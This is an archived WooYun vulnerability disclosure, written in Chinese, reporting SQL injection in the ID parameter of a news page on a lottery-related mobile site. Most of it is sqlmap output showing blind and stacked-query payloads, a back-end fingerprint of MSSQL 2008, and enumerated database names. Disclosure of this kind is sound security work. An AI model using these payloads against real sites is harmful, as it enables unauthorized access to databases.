乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-01: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-15: 厂商已经主动忽略漏洞,细节向公众公开
跟钱有关系的都不是小事
不知道是真是假?好流比的样子 !下次我也来这买几注 沾沾喜气问题参数ID:
http://m.qucai.com/information/news_view.aspx?ID=24
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 73 HTTP(s) requests:---Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=24 AND 4170=4170 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: ID=24;WAITFOR DELAY '0:0:5'-----[22:30:56] [INFO] testing Microsoft SQL Server[22:30:56] [INFO] confirming Microsoft SQL Server[22:30:57] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[22:30:57] [INFO] fetching database names[22:30:57] [INFO] fetching number of databases[22:30:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[22:30:57] [INFO] retrieved: 8[22:30:59] [INFO] retrieved: master[22:31:12] [INFO] retrieved: model[22:31:24] [INFO] retrieved: msdb[22:31:34] [INFO] retrieved: QUCAICOM[22:31:53] [INFO] retrieved: ReportServer[22:32:21] [INFO] retrieved: ReportServerTempDB[22:32:59] [INFO] retrieved: tempdb[22:33:13] [INFO] retrieved: testavailable databases [8]:[ mask 区域 *****ste**********ode**********sdb**********UCA**********ortS**********erverT**********emp********** t***** [22:33:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/m.qucai.com'[*] shutting down at 22:33:23
*****ste**********ode**********sdb**********UCA**********ortS**********erverT**********emp********** t*****
[22:33:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/m.qucai.com'[*] shutting down at 22:33:23
已经证明
你们更懂
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)